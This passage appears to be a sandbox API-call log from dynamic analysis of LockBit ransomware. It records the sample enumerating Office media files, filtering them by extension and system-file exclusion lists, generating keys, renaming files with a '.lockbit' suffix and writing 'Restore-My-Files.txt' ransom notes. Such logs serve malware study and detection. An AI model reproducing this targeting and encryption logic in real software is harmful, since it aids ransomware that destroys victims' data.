[0199.479] lstrcmpiW (lpString1="ntldr", lpString2="J0305257.WMF") returned 1 [0199.479] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0305257.WMF") returned 1 [0199.479] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0305257.WMF") returned -1 [0199.479] lstrcmpiW (lpString1="autorun.inf", lpString2="J0305257.WMF") returned -1 [0199.479] lstrcmpiW (lpString1="thumbs.db", lpString2="J0305257.WMF") returned 1 [0199.479] lstrcmpiW (lpString1="iconcache.db", lpString2="J0305257.WMF") returned -1 [0199.479] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.479] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF") returned=".WMF" [0199.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.480] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.480] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.481] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.481] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.481] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF.lockbit") returned 70 [0199.481] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0305257.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.490] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.490] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.491] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=23280) returned 1 [0199.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.492] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.493] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.494] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.495] free (_Block=0x1fa2ed8) [0199.495] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.495] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.495] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494c0d00, ftCreationTime.dwHighDateTime=0x1bf4534, ftLastAccessTime.dwLowDateTime=0xbd6b5ec0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x494c0d00, ftLastWriteTime.dwHighDateTime=0x1bf4534, nFileSizeHigh=0x0, nFileSizeLow=0x3372, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0305493.WMF", cAlternateFileName="")) returned 1 [0199.495] lstrcmpiW (lpString1=".", lpString2="J0305493.WMF") returned -1 [0199.495] lstrcmpiW (lpString1="..", lpString2="J0305493.WMF") returned -1 [0199.496] PathFindExtensionW (pszPath="J0305493.WMF") returned=".WMF" [0199.496] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.497] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0305493.WMF") returned 1 [0199.497] lstrcmpiW (lpString1="ntldr", lpString2="J0305493.WMF") returned 1 [0199.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0305493.WMF") returned 1 [0199.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0305493.WMF") returned -1 [0199.497] lstrcmpiW (lpString1="autorun.inf", lpString2="J0305493.WMF") returned -1 [0199.497] lstrcmpiW (lpString1="thumbs.db", lpString2="J0305493.WMF") returned 1 [0199.497] lstrcmpiW (lpString1="iconcache.db", lpString2="J0305493.WMF") returned -1 [0199.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.498] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF") returned=".WMF" [0199.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.498] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.498] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.499] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.499] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.499] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.499] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF.lockbit") returned 70 [0199.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0305493.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.500] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.500] malloc (_Size=0x40068) returned 0x3d70450 [0199.500] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13170) returned 1 [0199.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.501] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.505] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.505] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.507] free (_Block=0x1fa2ed8) [0199.507] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.507] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.507] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8598100, ftCreationTime.dwHighDateTime=0x1bf71c6, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb8598100, ftLastWriteTime.dwHighDateTime=0x1bf71c6, nFileSizeHigh=0x0, nFileSizeLow=0x60e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0315447.JPG", cAlternateFileName="")) returned 1 [0199.507] lstrcmpiW (lpString1=".", lpString2="J0315447.JPG") returned -1 [0199.507] lstrcmpiW (lpString1="..", lpString2="J0315447.JPG") returned -1 [0199.507] PathFindExtensionW (pszPath="J0315447.JPG") returned=".JPG" [0199.507] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0199.507] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.508] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0199.508] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0199.509] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0199.509] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0315447.JPG") returned 1 [0199.509] lstrcmpiW (lpString1="ntldr", lpString2="J0315447.JPG") returned 1 [0199.509] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0315447.JPG") returned 1 [0199.509] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0315447.JPG") returned -1 [0199.509] lstrcmpiW (lpString1="autorun.inf", lpString2="J0315447.JPG") returned -1 [0199.509] lstrcmpiW (lpString1="thumbs.db", lpString2="J0315447.JPG") returned 1 [0199.510] lstrcmpiW (lpString1="iconcache.db", lpString2="J0315447.JPG") returned -1 [0199.510] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.510] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG") returned=".JPG" [0199.510] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0199.510] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0199.510] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0199.511] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0199.511] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0199.511] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0199.511] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG.lockbit") returned 70 [0199.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0315447.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.512] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.512] malloc (_Size=0x40068) returned 0x3f70048 [0199.512] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=24804) returned 1 [0199.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.513] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.518] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.518] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.518] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.520] free (_Block=0x1fa2ed8) [0199.520] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.520] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.520] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.520] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x653ad300, ftCreationTime.dwHighDateTime=0x1bfaf58, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, 